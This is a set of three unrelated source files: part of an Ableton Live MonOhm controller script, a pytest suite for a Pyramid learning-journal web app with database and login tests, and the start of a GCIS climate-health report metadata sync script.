self._backlight_type = BACKLIGHT_TYPE[1]
self._backlight = BACKLIGHT_VALUE[1]
self.deassign_left_dials()
for track in range(4):
channel_strip_send_controls = []
for control in range(3):
channel_strip_send_controls.append(self._dial[track + (control * 4)])
self._mixer.channel_strip(track).set_send_controls(tuple(channel_strip_send_controls))
def assign_left_filter_dials(self):
self._backlight_type = BACKLIGHT_TYPE[2]
self._backlight = BACKLIGHT_VALUE[2]
self.deassign_left_dials()
for index in range(4):
self._mixer.track_filter(index).set_filter_controls(self._dial[index], self._dial[index + 4])
for track in range(4):
self._mixer.channel_strip(track).set_pan_control(self._dial[track + 8])
def assign_left_user_dials(self):
self._backlight_type = BACKLIGHT_TYPE[3]
self._backlight = BACKLIGHT_VALUE[3]
self.deassign_left_dials()
for index in range(12):
self._dial[index].set_channel(L_USER_DIAL_CHAN)
self._dial[index].set_identifier(L_USER_DIAL_MAP[index])
self._dial[index].set_enabled(False)
"""right control management methods"""
def deassign_right_controls(self):
self._mixer.master_strip().set_volume_control(None)
self._mixer.set_prehear_volume_control(None)
for index in range(4):
self._mixer.channel_strip(index + 4).set_volume_control(None)
self._mixer2.channel_strip(index).set_volume_control(None)
self._mixer2.return_strip(index).set_volume_control(None)
self._mixer2.return_strip(index).set_pan_control(None)
self._mixer2.selected_strip().set_send_controls(None)
self._mixer2.return_strip(0).set_send_controls(tuple([None, None]))
self._mixer2.return_strip(1).set_send_controls(tuple([None, None]))
self._dial[index + 12].use_default_message()
self._fader[index + 4].use_default_message()
self._dial[index + 12].release_parameter()
self._fader[index + 4].release_parameter()
self._fader[index + 4].set_enabled(True)
self._dial[index + 12].set_enabled(True)
def assign_right_volume_controls(self):
#self._ohm_type = OHM_TYPE[0]
#self._ohm = OHM_VALUE[0]
self.deassign_right_controls()
for index in range(4):
if(self._mixer2.channel_strip(index)):
self._mixer2.channel_strip(index).set_volume_control(self._fader[index + 4])
for index in range(4):
if(self._mixer2.return_strip(index)):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_right_return_controls(self):
self._ohm_type = OHM_TYPE[3]
self._ohm = OHM_VALUE[3]
self.deassign_right_controls()
#need to turn off session2 and session_zoom2 here, and in all subsequent right side modes
#self._session_main._highlighting_callback(len(self.song.song.tracks), self._session2._scene_offset, 4, 5, 1)
self._session2.set_show_highlight(False)
for index in range(4):
if(self._mixer2.return_strip(index)):
self._mixer2.return_strip(index).set_volume_control(self._fader[index + 4])
self._mixer2.return_strip(index).set_pan_control(self._dial[index + 12])
"""main control management methods"""
def assign_main_controls1(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_device_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_main_controls2(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_send_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_main_controls3(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_filter_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
def assign_main_controls4(self):
self.deassign_right_controls()
self.deassign_left_dials()
for column in range(8):
self._mixer.channel_strip(column).set_volume_control(self._fader[column])
self.assign_left_user_dials()
for index in range(4):
self._mixer2.return_strip(index).set_volume_control(self._dial[index + 12])
"""menu button management methods"""
def deassign_menu(self):
for index in range(6):
self._menu[index].set_on_off_values(127, 0)
self._device.set_lock_button(None)
self._device.set_on_off_button(None)
self._device_navigator.set_device_nav_buttons(None, None)
self._device.set_bank_nav_buttons(None, None)
self._transport.set_play_button(None)
self._transport.set_record_button(None)
self._transport.set_stop_button(None)
self._transport.set_loop_button(None)
self._transport.set_overdub_button(None)
self._session.set_stop_all_clips_button(None)
self._transport.set_play_button(None)
self._transport.set_stop_button(None)
self._session_main.set_track_bank_buttons(None, None)
self._session_main.set_scene_bank_buttons(None, None)
def assign_device_nav_to_menu(self):
self._menu[2].set_on_value(DEVICE_LOCK[self._rgb])
self._device.set_lock_button(self._menu[2])
self._menu[1].set_on_value(DEVICE_ON[self._rgb])
self._device.set_on_off_button(self._menu[1])
for index in range(2):
self._menu[index + 4].set_on_value(DEVICE_NAV[self._rgb])
self._menu[index * 3].set_on_value(DEVICE_BANK[self._rgb])
self._device_navigator.set_device_nav_buttons(self._menu[4], self._menu[5])
self._device.set_bank_nav_buttons(self._menu[0], self._menu[3])
def assign_transport_to_menu(self):
self._menu[0].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[0])
self._menu[2].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._menu[2])
self._menu[1].set_on_value(STOP[self._rgb])
self._transport.set_stop_button(self._menu[1])
self._menu[3].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._menu[3])
self._menu[5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._menu[5])
self._menu[4].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._menu[4])
def assign_session_nav_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[1])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[2])
for index in range(2):
self._menu[index + 4].set_on_value(SESSION_NAV[self._rgb])
self._menu[index * 3].set_on_value(SESSION_NAV[self._rgb])
self._session.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session.set_scene_bank_buttons(self._menu[3], self._menu[0])
def assign_monomod_shift_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[1])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[2])
for index in range(2):
self._menu[index + 4].set_on_value(DEVICE_NAV[self._rgb])
self._menu[index * 3].set_on_value(DEVICE_BANK[self._rgb])
self._device_navigator.set_device_nav_buttons(self._menu[4], self._menu[5])
self._device.set_bank_nav_buttons(self._menu[0], self._menu[3])
def assign_session_bank_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[0])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[1])
for index in range(2):
self._menu[index + 4].set_on_value(BANK_BUTTONS[self._rgb])
self._menu[index * 3].set_on_value(BANK_BUTTONS[self._rgb])
self._session.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session.set_scene_bank_buttons(self._menu[3], self._menu[0])
def assign_session2_bank_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[0])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[1])
for index in range(2):
self._menu[index + 4].set_on_value(BANK_BUTTONS[self._rgb])
self._menu[index * 3].set_on_value(BANK_BUTTONS[self._rgb])
self._session2.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session2.set_scene_bank_buttons(self._menu[3], self._menu[0])
def assign_session_main_nav_to_menu(self):
self._menu[1].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb])
self._transport.set_play_button(self._menu[1])
self._menu[2].set_on_off_values(STOP[self._rgb], STOP[self._rgb])
self._transport.set_stop_button(self._menu[2])
for index in range(2):
self._menu[index + 4].set_on_value(BANK_BUTTONS[self._rgb])
self._menu[index * 3].set_on_value(BANK_BUTTONS[self._rgb])
self._session_main.set_track_bank_buttons(self._menu[5], self._menu[4])
self._session_main.set_scene_bank_buttons(self._menu[3], self._menu[0])
"""channel selection management methods"""
def deassign_channel_select_buttons(self):
for index in range(8):
if(self._mixer.channel_strip(index)):
self._mixer.channel_strip(index).set_select_button(None)
self._button[index].release_parameter()
for index in range(4):
self._mixer2.channel_strip(index).set_select_button(None)
self._mixer2.return_strip(index).set_select_button(None)
self._mixer2.master_strip().set_select_button(None)
self._button[index + 4].release_parameter()
def assign_channel_select_buttons(self):
for index in range(4):
#if(self._mixer.channel_strip(index)):
self._button[index].set_on_off_values(127, 0)
self._mixer.channel_strip(index).set_select_button(self._button[index])
if(self._r_function_mode._mode_index < 3):
for index in range(4):
#if(self._mixer2.channel_strip(index)):
self._button[index].set_on_off_values(127, 0)
self._mixer2.channel_strip(index).set_select_button(self._button[index + 4])
#elif(self._r_function_mode._mode_index < 3):
else:
for index in range(4):
#if(self._mixer2.return_strip(index)):
self._button[index].set_on_off_values(1, 0)
self._mixer2.return_strip(index).set_select_button(self._button[index + 4])
def assign_return_select_buttons(self):
for index in range(4):
self._button[index + 4].set_off_value(0)
if(self._mixer.channel_strip(index)):
self._button[index + 4].set_on_value(1)
self._mixer.channel_strip(index).set_select_button(self._button[index + 4])
def assign_l_channel_select_buttons(self):
self._mixer.set_select_buttons(None, None)
self._session.set_select_buttons(None, None)
for index in range(4):
self._button[index].set_off_value(0)
if(self._mixer.channel_strip(index)):
self._mixer.channel_strip(index).set_select_button(self._button[index])
def assign_r_channel_select_buttons(self):
self._mixer2.set_select_buttons(None, None)
self._session2.set_select_buttons(None, None)
for index in range(4):
self._button[index + 4].set_off_value(0)
if(self._mixer2.channel_strip(index)):
self._mixer2.channel_strip(index).set_select_button(self._button[index + 4])
def assign_main_channel_select_buttons(self):
for index in range(8):
self._button[index].set_off_value(0)
if(self._mixer.channel_strip(index)):
self._button[index].set_on_value(127)
self._mixer.channel_strip(index).set_select_button(self._button[index])
def assign_shift_controls(self):
if self._disable_master is False:
self.deassign_right_controls()
self._mixer.master_strip().set_volume_control(self._fader[7])
self._mixer.set_prehear_volume_control(self._dial[15])
self._mixer2.return_strip(0).set_send_controls(tuple([None, self._fader[4]]))
self._mixer2.return_strip(1).set_send_controls(tuple([self._fader[5], None]))
"""called on timer"""
def update_display(self):
ControlSurface.update_display(self)
self._timer = (self._timer + 1) % 256
self.flash()
self.strobe()
def flash(self):
if(self.flash_status > 0):
for control in self.controls:
if isinstance(control, MonoButtonElement):
control.flash(self._timer)
def strobe(self):
if(self._backlight_type != 'static'):
if(self._backlight_type is 'pulse'):
self._backlight = int(math.fabs(((self._timer * 8) % 64) -32) +32)
if(self._backlight_type is 'up'):
self._backlight = int(((self._timer * 4) % 64) + 16)
if(self._backlight_type is 'down'):
self._backlight = int(math.fabs(int(((self._timer * 4) % 64) - 64)) + 16)
if(self._rgb == 1):
self._send_midi(tuple([176, 27, int(self._backlight)]))
else:
self._send_midi(tuple([176, 118, int(self._backlight)]))
if(self._ohm_type != 'static'):
if(self._ohm_type is 'pulse'):
self._ohm = int(math.fabs(((self._timer * 8) % 64) -32) +32)
if(self._ohm_type is 'up'):
self._ohm = int(((self._timer * 4) % 64) + 16)
if(self._ohm_type is 'down'):
self._ohm = int(math.fabs(int(((self._timer * 4) % 64) - 64)) + 16)
if(self._rgb == 1):
self._send_midi(tuple([176, 63, int(self._ohm)]))
self._send_midi(tuple([176, 31, int(self._ohm)]))
else:
self._send_midi(tuple([176, 119, int(self._ohm)]))
"""m4l bridge"""
def generate_strip_string(self, display_string):
NUM_CHARS_PER_DISPLAY_STRIP = 12
if (not display_string):
return (' ' * NUM_CHARS_PER_DISPLAY_STRIP)
if ((len(display_string.strip()) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.endswith('dB') and (display_string.find('.') != -1))):
display_string = display_string[:-2]
if (len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)):
for um in [' ',
'i',
'o',
'u',
'e',
'a']:
while ((len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.rfind(um, 1) != -1)):
um_pos = display_string.rfind(um, 1)
display_string = (display_string[:um_pos] + display_string[(um_pos + 1):])
else:
display_string = display_string.center((NUM_CHARS_PER_DISPLAY_STRIP - 1))
ret = u''
for i in range((NUM_CHARS_PER_DISPLAY_STRIP - 1)):
if ((ord(display_string[i]) > 127) or (ord(display_string[i]) < 0)):
ret += ' '
else:
ret += display_string[i]
ret += ' '
ret = ret.replace(' ', '_')
assert (len(ret) == NUM_CHARS_PER_DISPLAY_STRIP)
return ret
def notification_to_bridge(self, name, value, sender):
if(isinstance(sender, MonoEncoderElement)):
self._monobridge._send(sender.name, 'lcd_name', str(self.generate_strip_string(name)))
self._monobridge._send(sender.name, 'lcd_value', str(self.generate_strip_string(value)))
def touched(self):
if(self._shift_mode._mode_index < 2):
if self._touched is 0:
self._monobridge._send('touch', 'on')
self.schedule_message(2, self.check_touch)
self._touched +=1
def check_touch(self):
if(self._shift_mode._mode_index < 2):
if self._touched > 5:
self._touched = 5
elif self._touched > 0:
self._touched -= 1
if self._touched is 0:
self._monobridge._send('touch', 'off')
else:
self.schedule_message(2, self.check_touch)
def get_clip_names(self):
clip_names = []
for scene in self._session._scenes:
for clip_slot in scene._clip_slots:
if clip_slot.has_clip() is True:
clip_names.append(clip_slot._clip_slot)##.clip.name)
return clip_slot._clip_slot
##self.log_message(str(clip_slot._clip_slot.clip.name))
return clip_names
"""midi functionality"""
def to_encoder(self, num, val):
rv=int(val*127)
self._device._parameter_controls[num].receive_value(rv)
p = self._device._parameter_controls[num]._parameter_to_map_to
newval = (val * (p.max - p.min)) + p.min
p.value = newval
def handle_sysex(self, midi_bytes):
assert(isinstance (midi_bytes, tuple))
#self.log_message(str('sysex') + str(midi_bytes))
if len(midi_bytes) > 10:
if midi_bytes[:11] == tuple([240, 126, 0, 6, 2, 0, 1, 97, 1, 0, 7]):
self.show_message(str('Ohm64 RGB detected...setting color map'))
self.log_message(str('Ohm64 RGB detected...setting color map'))
self._rgb = 0
self._host._host_name = 'OhmRGB'
self._color_type = 'OhmRGB'
for button in self._button:
button._color_map = COLOR_MAP
for column in self._grid:
for button in column:
button._color_map = COLOR_MAP
elif midi_bytes[:11] == tuple([240, 126, 0, 6, 2, 0, 1, 97, 1, 0, 2]):
self.show_message(str('Ohm64 Monochrome detected...setting color map'))
self.log_message(str('Ohm64 Monochrome detected...setting color map'))
self._rgb = 1
self._host._host_name = 'Ohm64'
self._color_type = 'Monochrome'
for button in self._button:
button._color_map = [127 for index in range(0, 7)]
for column in self._grid:
for button in column:
button._color_map = [127 for index in range(0, 7)]
self._assign_session_colors()
def receive_external_midi(self, midi_bytes):
#self.log_message('receive_external_midi' + str(midi_bytes))
assert (midi_bytes != None)
assert isinstance(midi_bytes, tuple)
with self.component_guard():
if (len(midi_bytes) is 3):
msg_type = (midi_bytes[0] & 240)
forwarding_key = [midi_bytes[0]]
self.log_message(str(self._forwarding_registry))
if (msg_type is not MIDI_PB_TYPE):
forwarding_key.append(midi_bytes[1])
recipient = self._forwarding_registry[tuple(forwarding_key)]
self.log_message('receive_midi recipient ' + str(recipient))
if (recipient != None):
recipient.receive_value(midi_bytes[2])
else:
self.handle_sysex(midi_bytes)
"""general functionality"""
def set_highlighting_session_component(self, session_component):
self._highlighting_session_component = session_component
self._highlighting_session_component.set_highlighting_callback(self._set_session_highlight)
def allow_updates(self, allow_updates):
for component in self.components:
component.set_allow_update(int(allow_updates!=0))
def disconnect(self):
"""clean things up on disconnect"""
"""for s in self._control_surfaces():
self.log_message('monohm disconnect finds ' + str(s))
if '_version_check' in dir(s):
if s._version_check == 'b994':
s.disconnect()"""
self._update_linked_device_selection = None
if self._session._is_linked():
self._session._unlink()
if self._cntrlr != None:
self._cntrlr._monohm = None
self._cntrlr = None
if self.song().view.selected_track_has_listener(self._update_selected_device):
self.song().view.remove_selected_track_listener(self._update_selected_device)
if self._session2.offset_has_listener(self._on_session_offset_changes):
self._session2.remove_offset_listener(self._on_session_offset_changes)
#self._disconnect_notifier.set_mode(0)
self.log_message("--------------= MonOhm " + str(self._monomod_version) + " log closed =--------------") #Create entry in log file
ControlSurface.disconnect(self)
return None
def device_follows_track(self, val):
self._device_selection_follows_track_selection = (val == 1)
return self
def _update_selected_device(self):
if(self._clutch_device_selection == False):
if self._device_selection_follows_track_selection is True:
track = self.song().view.selected_track
device_to_select = track.view.selected_device
if device_to_select == None and len(track.devices) > 0:
device_to_select = track.devices[0]
if device_to_select != None:
self.song().view.select_device(device_to_select)
#self._device.set_device(device_to_select)
self.set_appointed_device(device_to_select)
#self._device_selector.set_enabled(True)
self.request_rebuild_midi_map()
return None
def assign_alternate_mappings(self):
for column in range(8):
for row in range(8):
self._grid[column][row].set_identifier(OHM_MAP_ID[column][row])
self._grid[column][row].set_identifier(OHM_MAP_CHANNEL[column][row])
self._grid[column][row].send_value(OHM_MAP_VALUE[column][row])
self._grid[column][row].set_enabled(False)
def get_session_offsets(self):
if(self._is_split is True):
return [self._session.track_offset(), self._session.scene_offset(), self._session2.track_offset(), self._session2.scene_offset()]
elif(self._is_split is False):
return [self._session_main.track_offset(), self._session_main.scene_offset(), (self._session_main.track_offset()) + 4, self._session_main.scene_offset()]
def set_split_mixer(self, is_split):
assert isinstance(is_split, type(False))
if(is_split!=self._is_split):
if(is_split is True):
self._mixer._track_offset = self._session._track_offset
else:
self._mixer._track_offset = self._session_main._track_offset
self._is_split = is_split
self._session_main.set_enabled(not is_split)
self._session.set_enabled(is_split)
self._session2.set_enabled(is_split)
self._mixer._reassign_tracks()
def set_split_mixer_monomod(self, is_split):
assert isinstance(is_split, type(False))
if(is_split!=self._is_split):
if(is_split is True):
self._mixer._track_offset = self._session._track_offset
else:
self._mixer._track_offset = self._session_main._track_offset
self._is_split = is_split
self._mixer._reassign_tracks()
def split_mixer(self):
return self._is_split
def _get_num_tracks(self):
return self.num_tracks
def _recalculate_selected_channel(self):
selected = False
for index in range(4):
if self.song().view.selected_track == self._mixer.channel_strip(index)._track:
selected = True
elif self.song().view.selected_track == self._mixer2.channel_strip(index)._track:
selected = True
if selected is False:
self.song().view.selected_track = self._mixer2.channel_strip(0)._track
def _on_device_changed(self, device):
#self.log_message('new device ' + str(type(device)))
if self._update_linked_device_selection != None:
self._update_linked_device_selection(device)
def mixer_on_cf_assign_changed(self, channel_strip):
def _on_cf_assign_changed():
if (channel_strip.is_enabled() and (channel_strip._crossfade_toggle != None)):
if (channel_strip._track != None) and (channel_strip._track in (channel_strip.song().tracks + channel_strip.song().return_tracks)):
if channel_strip._track.mixer_device.crossfade_assign == 1: #modified
channel_strip._crossfade_toggle.turn_off()
elif channel_strip._track.mixer_device.crossfade_assign == 0:
channel_strip._crossfade_toggle.send_value(1)
else:
channel_strip._crossfade_toggle.send_value(2)
return _on_cf_assign_changed
def device_is_banking_enabled(self, device):
def _is_banking_enabled():
return True
return _is_banking_enabled
def _on_session_offset_changes(self):
if self._r_function_mode._mode_index in range(0,3):
self._mem[int(self._r_function_mode._mode_index)] = self._session2.track_offset()
def connect_script_instances(self, instanciated_scripts):
link = False
for s in instanciated_scripts:
if '_monomod_version' in dir(s):
if s._monomod_version == self._monomod_version:
if '_link_mixer' in dir(s):
if s._link_mixer is True:
link = True
if link is True:
if not self._session._is_linked():
self._session.set_offsets(LINK_OFFSET[0], LINK_OFFSET[1])
self._session._link()
"""for s in self._control_surfaces():
self.log_message('monohm finds ' + str(s))
if '_version_check' in dir(s):
if s._version_check == 'b994':
if s._awake == False:
s.connect_script_instances(instanciated_scripts)"""
def device_set_device(self, device_component):
def _set_device(device):
DeviceComponent.set_device(device_component, device)
self._on_device_changed(device)
return _set_device
def _on_device_changed(self, device):
#self.log_message('new device ' + str(type(device)))
if self._update_linked_device_selection != None:
self._update_linked_device_selection(device)
# a
|
|
# -*- coding: utf-8 -*-
from contextlib import closing
from pyramid import testing
import pytest
import datetime
import os
from psycopg2 import IntegrityError
from webtest.app import AppError
from cryptacular.bcrypt import BCRYPTPasswordManager
from journal import connect_db
from journal import DB_SCHEMA
from journal import INSERT_ENTRY
TEST_DSN = 'dbname=test_learning_journal user=ndraper2'
def init_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute(DB_SCHEMA)
db.commit()
def clear_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DROP TABLE entries")
db.commit()
def clear_entries(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DELETE FROM entries")
db.commit()
def run_query(db, query, params=(), get_results=True):
cursor = db.cursor()
cursor.execute(query, params)
db.commit()
results = None
if get_results:
results = cursor.fetchall()
return results
@pytest.fixture(scope='session')
def db(request):
"""set up and tear down a database"""
settings = {'db': TEST_DSN}
init_db(settings)
def cleanup():
clear_db(settings)
request.addfinalizer(cleanup)
return settings
@pytest.yield_fixture(scope='function')
def req_context(db, request):
"""mock a request with a database attached"""
settings = db
req = testing.DummyRequest()
with closing(connect_db(settings)) as db:
req.db = db
req.exception = None
yield req
# after a test has run, we clear out entries for isolation
clear_entries(settings)
def test_write_entry(req_context):
from journal import write_entry
fields = ('title', 'text')
expected = ('Test Title', 'Test Text')
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
result = write_entry(req_context)
# manually commit so we can see the entry on query
req_context.db.commit()
rows = run_query(req_context.db, "SELECT title, text FROM entries")
assert len(rows) == 1
actual = rows[0]
for idx, val in enumerate(expected):
assert val == actual[idx]
def test_write_entry_not_string(req_context):
# 5 gets turned into a string, None throws an integrity error
from journal import write_entry
fields = ('title', 'text')
expected = (5, None)
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
with pytest.raises(IntegrityError):
result = write_entry(req_context)
def test_write_entry_wrong_columns(req_context):
# throws integrity error for not writing into title and text
from journal import write_entry
fields = ('bob', 'hope')
expected = ('some text', 'more text')
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
with pytest.raises(IntegrityError):
result = write_entry(req_context)
def test_write_entry_extra_columns(req_context):
# when we write into columns that aren't there, nothing happens
from journal import write_entry
fields = ('title', 'bob', 'text', 'hope')
expected = ('some text', 'more text', 'more', 'less')
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
result = write_entry(req_context)
# manually commit so we can see the entry on query
req_context.db.commit()
rows = run_query(req_context.db, "SELECT title, text FROM entries")
assert len(rows) == 1
assert rows == [('some text', 'more')]
def test_read_entries_empty(req_context):
# call the function under test
from journal import read_entries
result = read_entries(req_context)
# make assertions about the result
assert 'entries' in result
assert len(result['entries']) == 0
def test_read_entries(req_context):
# prepare data for testing
now = datetime.datetime.utcnow()
expected = ('Test Title', 'Test Text', now)
run_query(req_context.db, INSERT_ENTRY, expected, False)
# call the function under test
from journal import read_entries
result = read_entries(req_context)
# make assertions about the result
assert 'entries' in result
assert len(result['entries']) == 1
for entry in result['entries']:
assert expected[0] == entry['title']
assert expected[1] == entry['text']
for key in 'id', 'created':
assert key in entry
@pytest.fixture(scope='function')
def app(db):
from journal import main
from webtest import TestApp
os.environ['DATABASE_URL'] = TEST_DSN
app = main()
return TestApp(app)
def test_empty_listing(app):
response = app.get('/')
assert response.status_code == 200
actual = response.body
expected = 'No entries here so far'
assert expected in actual
@pytest.fixture(scope='function')
def entry(db, request):
"""provide a single entry in the database"""
settings = db
now = datetime.datetime.utcnow()
expected = ('Test Title', 'Test Text', now)
with closing(connect_db(settings)) as db:
run_query(db, INSERT_ENTRY, expected, False)
db.commit()
def cleanup():
clear_entries(settings)
request.addfinalizer(cleanup)
return expected
def test_listing(app, entry):
response = app.get('/')
assert response.status_code == 200
actual = response.body
for expected in entry[:2]:
assert expected in actual
def test_post_to_add_view(app):
entry_data = {
'title': 'Hello there',
'text': 'This is a post',
}
response = app.post('/add', params=entry_data, status='3*')
redirected = response.follow()
actual = redirected.body
for expected in entry_data.values():
assert expected in actual
def test_post_to_add_view_using_get(app):
entry_data = {
'title': 'Hello there',
'text': 'This is a post',
}
with pytest.raises(AppError):
response = app.get('/add', params=entry_data, status='3*')
@pytest.fixture(scope='function')
def auth_req(request):
manager = BCRYPTPasswordManager()
settings = {
'auth.username': 'admin',
'auth.password': manager.encode('secret'),
}
testing.setUp(settings=settings)
req = testing.DummyRequest()
def cleanup():
testing.tearDown()
request.addfinalizer(cleanup)
return req
def test_do_login_success(auth_req):
from journal import do_login
auth_req.params = {'username': 'admin', 'password': 'secret'}
assert do_login(auth_req)
def test_do_login_bad_pass(auth_req):
from journal import do_login
auth_req.params = {'username': 'admin', 'password': 'wrong'}
assert not do_login(auth_req)
def test_do_login_bad_user(auth_req):
from journal import do_login
auth_req.params = {'username': 'bad', 'password': 'secret'}
assert not do_login(auth_req)
def test_do_login_missing_params(auth_req):
from journal import do_login
for params in ({'username': 'admin'}, {'password': 'secret'}):
auth_req.params = params
with pytest.raises(ValueError):
do_login(auth_req)
INPUT_BTN = '<input type="submit" value="Share" name="Share"/>'
def login_helper(username, password, app):
"""encapsulate app login for reuse in tests
Accept all status codes so that we can make assertions in tests
"""
login_data = {'username': username, 'password': password}
return app.post('/login', params=login_data, status='*')
def test_start_as_anonymous(app):
response = app.get('/', status=200)
actual = response.body
assert INPUT_BTN not in actual
def test_login_success(app):
username, password = ('admin', 'secret')
redirect = login_helper(username, password, app)
assert redirect.status_code == 302
response = redirect.follow()
assert response.status_code == 200
actual = response.body
assert INPUT_BTN in actual
def test_login_fails(app):
username, password = ('admin', 'wrong')
response = login_helper(username, password, app)
assert response.status_code == 200
actual = response.body
assert "Login Failed" in actual
assert INPUT_BTN not in actual
def test_logout(app):
# re-use existing code to ensure we are logged in when we begin
test_login_success(app)
redirect = app.get('/logout', status="3*")
response = redirect.follow()
assert response.status_code == 200
actual = response.body
assert INPUT_BTN not in actual
|
|
__author__ = 'abuddenberg'
from gcis_clients import GcisClient, SurveyClient, survey_token, gcis_dev_auth, gcis_stage_auth
from gcis_clients.domain import Report, Chapter
# from sync_utils import realize_parents, realize_contributors
from collections import OrderedDict
import pickle
import sys
# gcis = GcisClient('http://data.gcis-dev-front.joss.ucar.edu', *gcis_dev_auth)
gcis = GcisClient('https://data-stage.globalchange.gov', *gcis_stage_auth)
surveys = SurveyClient('https://healthresources.cicsnc.org', survey_token)
sync_metadata_tree = {
'usgcrp-climate-human-health-assessment-2016': OrderedDict([
('front-matter', [
('/metadata/figures/3931', 'understanding-the-exposure-pathway-diagrams'),
]),
('executive-summary', [
('/metadata/figures/3906', 'examples-of-climate-impacts-on-human-health'),
('/metadata/figures/3832', 'es-climate-change-and-health'),
('/metadata/figures/3833', 'es-projected-changes-in-deaths-in-us-cities-by-season'),
('/metadata/figures/3834', 'es-projected-change-in-temperature-ozone-and-ozone-related-premature-deaths-in-2030'),
('/metadata/figures/3838', 'es-estimated-deaths-and-billion-dollar-losses-from-extreme-weather-events-in-the-u-s-2004-2013'),
('/metadata/figures/3835', 'es-changes-in-lyme-disease-case-report-distribution'),
('/metadata/figures/3836', 'es-links-between-climate-change-water-quantity-and-quality-and-human-exposure-to-water-related-illness'),
('/metadata/figures/3837', 'es-farm-to-table'),
('/metadata/figures/3839', 'es-the-impact-of-climate-change-on-physical-mental-and-community-health'),
('/metadata/figures/3840', 'es-determinants-of-vulnerability')
]),
('climate-change-and-human-health', [
('/metadata/figures/3698', 'major-us-climate-trends'), #1.1 #climate-change-and-human-health
('/metadata/figures/3632', 'change-in-number-of-extreme-precipitation-events'), #1.2 #climate-change-and-human-health
('/metadata/figures/3635', 'projected-changes-in-temperature-and-precipitation-by-mid-century'), #1.3 #climate-change-and-human-health
('/metadata/figures/3633', 'projected-changes-in-hottest-coldest-and-wettest-driest-day-of-the-year'), #1.4 #climate-change-and-human-health
('/metadata/figures/3757', 'climate-change-and-health'), #1.5 #climate-change-and-human-health
('/metadata/figures/3933', 'sources-of-uncertainty'), #1.6 #climate-change-and-human-health
]),
('temperature-related-death-and-illness', [
('/metadata/figures/3811', 'climate-change-and-health-extreme-heat'), #2.1 #temperature-related-death-and-illness
('/metadata/figures/3585', 'heat-related-deaths-during-the-1995-chicago-heat-wave'), #2.2 #temperature-related-death-and-illness
('/metadata/figures/3643', 'projected-changes-in-temperature-related-death-rates'), #2.3 #temperature-related-death-and-illness
('/metadata/figures/3653', 'projected-changes-in-deaths-in-us-cities-by-season'), #2.4 #temperature-related-death-and-illness
]),
('air-quality-impacts', [
('/metadata/figures/3812', 'climate-change-and-health-outdoor-air-quality'), #3.1 #air-quality-impacts
('/metadata/figures/3647', 'projected-change-in-temperature-ozone-and-ozone-related-premature-deaths-in-2030'), #3.2 #air-quality-impacts
('/metadata/figures/3649', 'projected-change-in-ozone-related-premature-deaths'), #3.3 #air-quality-impacts
('/metadata/figures/3650', 'ragweed-pollen-season-lengthens'), #3.4 #air-quality-impacts
]),
('extreme-events', [
('/metadata/figures/3810', 'estimated-deaths-and-billion-dollar-losses-from-extreme-weather-events-in-the-us-2004-2013'), #4.1 #extreme-weather #Has Activities
('/metadata/figures/3808', 'climate-change-and-health-flooding'), #4.2 #extreme-weather
('/metadata/figures/3760', 'hurricane-induced-flood-effects-in-eastern-and-central-united-states'), #4.3 #extreme-weather
('/metadata/figures/3907', 'projected-increases-in-very-large-fires'), #4.4 #extreme-weather
]),
('vectorborne-diseases', [
('/metadata/figures/3807', 'climate-change-and-health-lyme-disease'), #5.1 #vectorborne-diseases
('/metadata/figures/3659', 'changes-in-lyme-disease-case-report-distribution'), #5.2 #vectorborne-diseases
